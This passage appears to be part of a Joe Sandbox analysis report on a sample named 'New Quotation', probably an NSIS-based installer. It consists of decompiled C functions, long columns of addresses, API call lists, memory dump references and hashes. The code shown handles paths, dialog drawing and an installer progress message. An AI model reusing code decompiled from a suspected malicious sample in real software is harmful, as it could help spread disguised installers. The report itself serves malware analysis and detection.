									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}






























                                                                                                                                                                                          0x0040657a
                                                                                                                                                                                          0x0040657a
                                                                                                                                                                                          0x0040657a
                                                                                                                                                                                          0x00406580
                                                                                                                                                                                          0x00406585
                                                                                                                                                                                          0x00406587
                                                                                                                                                                                          0x00406596
                                                                                                                                                                                          0x00406596
                                                                                                                                                                                          0x0040659e
                                                                                                                                                                                          0x0040659f
                                                                                                                                                                                          0x004065a0
                                                                                                                                                                                          0x004065a1
                                                                                                                                                                                          0x004065a4
                                                                                                                                                                                          0x004065ac
                                                                                                                                                                                          0x004065ae
                                                                                                                                                                                          0x004065bf
                                                                                                                                                                                          0x004065c2
                                                                                                                                                                                          0x004065c2
                                                                                                                                                                                          0x004065c6
                                                                                                                                                                                          0x004065cc
                                                                                                                                                                                          0x004065cf
                                                                                                                                                                                          0x004067aa
                                                                                                                                                                                          0x004067aa
                                                                                                                                                                                          0x004067b5
                                                                                                                                                                                          0x004067c1
                                                                                                                                                                                          0x004067c1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004065d5
                                                                                                                                                                                          0x004065da
                                                                                                                                                                                          0x004065ef
                                                                                                                                                                                          0x004065f0
                                                                                                                                                                                          0x004065f6
                                                                                                                                                                                          0x00406788
                                                                                                                                                                                          0x00406796
                                                                                                                                                                                          0x00406799
                                                                                                                                                                                          0x00406799
                                                                                                                                                                                          0x0040678a
                                                                                                                                                                                          0x0040678d
                                                                                                                                                                                          0x00406790
                                                                                                                                                                                          0x00406792
                                                                                                                                                                                          0x00406792
                                                                                                                                                                                          0x0040679b
                                                                                                                                                                                          0x0040679b
                                                                                                                                                                                          0x004067a1
                                                                                                                                                                                          0x004067a4
                                                                                                                                                                                          0x004065d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004065d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004067a4
                                                                                                                                                                                          0x004065fc
                                                                                                                                                                                          0x004065ff
                                                                                                                                                                                          0x0040660e
                                                                                                                                                                                          0x00406615
                                                                                                                                                                                          0x00406621
                                                                                                                                                                                          0x00406624
                                                                                                                                                                                          0x00406627
                                                                                                                                                                                          0x00406628
                                                                                                                                                                                          0x0040662d
                                                                                                                                                                                          0x00406633
                                                                                                                                                                                          0x00406636
                                                                                                                                                                                          0x00406639
                                                                                                                                                                                          0x0040672c
                                                                                                                                                                                          0x00406731
                                                                                                                                                                                          0x00406764
                                                                                                                                                                                          0x00406769
                                                                                                                                                                                          0x0040676e
                                                                                                                                                                                          0x00406773
                                                                                                                                                                                          0x00406773
                                                                                                                                                                                          0x00406778
                                                                                                                                                                                          0x0040677e
                                                                                                                                                                                          0x00406781
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406781
                                                                                                                                                                                          0x00406733
                                                                                                                                                                                          0x00406736
                                                                                                                                                                                          0x00406739
                                                                                                                                                                                          0x0040674e
                                                                                                                                                                                          0x00406755
                                                                                                                                                                                          0x0040673b
                                                                                                                                                                                          0x00406742
                                                                                                                                                                                          0x00406742
                                                                                                                                                                                          0x0040675d
                                                                                                                                                                                          0x00406760
                                                                                                                                                                                          0x00406724
                                                                                                                                                                                          0x00406725
                                                                                                                                                                                          0x00406725
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406760
                                                                                                                                                                                          0x00406646
                                                                                                                                                                                          0x0040664a
                                                                                                                                                                                          0x0040664a
                                                                                                                                                                                          0x0040664b
                                                                                                                                                                                          0x0040664d
                                                                                                                                                                                          0x0040668a
                                                                                                                                                                                          0x0040668d
                                                                                                                                                                                          0x0040669d
                                                                                                                                                                                          0x004066a0
                                                                                                                                                                                          0x004066a8
                                                                                                                                                                                          0x004066ae
                                                                                                                                                                                          0x004066ae
                                                                                                                                                                                          0x00406709
                                                                                                                                                                                          0x00406709
                                                                                                                                                                                          0x0040670b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004066b2
                                                                                                                                                                                          0x004066b7
                                                                                                                                                                                          0x004066b8
                                                                                                                                                                                          0x004066ba
                                                                                                                                                                                          0x004066d1
                                                                                                                                                                                          0x004066df
                                                                                                                                                                                          0x004066e5
                                                                                                                                                                                          0x004066e7
                                                                                                                                                                                          0x00406705
                                                                                                                                                                                          0x00406705
                                                                                                                                                                                          0x00406705
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406705
                                                                                                                                                                                          0x004066ed
                                                                                                                                                                                          0x004066f6
                                                                                                                                                                                          0x004066f9
                                                                                                                                                                                          0x004066ff
                                                                                                                                                                                          0x00406703
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406703
                                                                                                                                                                                          0x004066cb
                                                                                                                                                                                          0x004066cd
                                                                                                                                                                                          0x004066cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004066cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406709
                                                                                                                                                                                          0x00406695
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040664f
                                                                                                                                                                                          0x0040666d
                                                                                                                                                                                          0x00406676
                                                                                                                                                                                          0x00406713
                                                                                                                                                                                          0x00406717
                                                                                                                                                                                          0x0040671f
                                                                                                                                                                                          0x0040671f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406717
                                                                                                                                                                                          0x00406680
                                                                                                                                                                                          0x0040670d
                                                                                                                                                                                          0x00406711
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406711
                                                                                                                                                                                          0x0040664d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004065da

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00000000,00425A20,753623A0), ref: 004066A8
                                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                          • API String ID: 4260037668-477758682
                                                                                                                                                                                          • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                          • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                                                                          0x00404512
                                                                                                                                                                                          0x004045c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004045c8
                                                                                                                                                                                          0x00404523
                                                                                                                                                                                          0x00404527
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404541
                                                                                                                                                                                          0x00404541
                                                                                                                                                                                          0x0040454a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040454c
                                                                                                                                                                                          0x00404558
                                                                                                                                                                                          0x0040455b
                                                                                                                                                                                          0x0040455b
                                                                                                                                                                                          0x00404561
                                                                                                                                                                                          0x00404567
                                                                                                                                                                                          0x00404567
                                                                                                                                                                                          0x00404573
                                                                                                                                                                                          0x00404579
                                                                                                                                                                                          0x00404580
                                                                                                                                                                                          0x00404583
                                                                                                                                                                                          0x00404586
                                                                                                                                                                                          0x00404588
                                                                                                                                                                                          0x00404588
                                                                                                                                                                                          0x00404590
                                                                                                                                                                                          0x00404596
                                                                                                                                                                                          0x00404596
                                                                                                                                                                                          0x004045a0
                                                                                                                                                                                          0x004045a5
                                                                                                                                                                                          0x004045a8
                                                                                                                                                                                          0x004045ad
                                                                                                                                                                                          0x004045b0
                                                                                                                                                                                          0x004045b0
                                                                                                                                                                                          0x004045c0
                                                                                                                                                                                          0x004045c0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004045c3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                          • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E004067C4(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                                          0x004067c6
                                                                                                                                                                                          0x004067cf
                                                                                                                                                                                          0x004067e6
                                                                                                                                                                                          0x004067e6
                                                                                                                                                                                          0x004067ed
                                                                                                                                                                                          0x004067f9
                                                                                                                                                                                          0x004067f9
                                                                                                                                                                                          0x004067fc
                                                                                                                                                                                          0x004067ff
                                                                                                                                                                                          0x00406804
                                                                                                                                                                                          0x00406806
                                                                                                                                                                                          0x0040680f
                                                                                                                                                                                          0x00406813
                                                                                                                                                                                          0x00406830
                                                                                                                                                                                          0x00406838
                                                                                                                                                                                          0x00406838
                                                                                                                                                                                          0x0040683d
                                                                                                                                                                                          0x0040683f
                                                                                                                                                                                          0x00406842
                                                                                                                                                                                          0x00406847
                                                                                                                                                                                          0x00406848
                                                                                                                                                                                          0x0040684c
                                                                                                                                                                                          0x0040684c
                                                                                                                                                                                          0x0040684d
                                                                                                                                                                                          0x00406854
                                                                                                                                                                                          0x00406856
                                                                                                                                                                                          0x0040685d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406865
                                                                                                                                                                                          0x0040686b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040686b
                                                                                                                                                                                          0x00406870

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75363420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                          • CharNextW.USER32(?,00000000,75363420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                          • CharPrevW.USER32(?,?,75363420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                          • API String ID: 589700163-2977677972
                                                                                                                                                                                          • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                          • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                                          0x00404e62
                                                                                                                                                                                          0x00404e6f
                                                                                                                                                                                          0x00404e75
                                                                                                                                                                                          0x00404eb3
                                                                                                                                                                                          0x00404eb3
                                                                                                                                                                                          0x00404ec2
                                                                                                                                                                                          0x00404ec9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404ecb
                                                                                                                                                                                          0x00404e77
                                                                                                                                                                                          0x00404e86
                                                                                                                                                                                          0x00404e8e
                                                                                                                                                                                          0x00404e91
                                                                                                                                                                                          0x00404ea3
                                                                                                                                                                                          0x00404ea9
                                                                                                                                                                                          0x00404eb0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00404eb0
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                          • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x2e2fc
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                                                                                          0x00402fa3
                                                                                                                                                                                          0x00402fb1
                                                                                                                                                                                          0x00402fb7
                                                                                                                                                                                          0x00402fb7
                                                                                                                                                                                          0x00402fc5
                                                                                                                                                                                          0x00402fc7
                                                                                                                                                                                          0x00402fcd
                                                                                                                                                                                          0x00402fd4
                                                                                                                                                                                          0x00402fd6
                                                                                                                                                                                          0x00402fd6
                                                                                                                                                                                          0x00402fec
                                                                                                                                                                                          0x00402ffc
                                                                                                                                                                                          0x0040300e
                                                                                                                                                                                          0x0040300e
                                                                                                                                                                                          0x00403016

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                          • MulDiv.KERNEL32(0002E2FC,00000064,?), ref: 00402FDC
                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
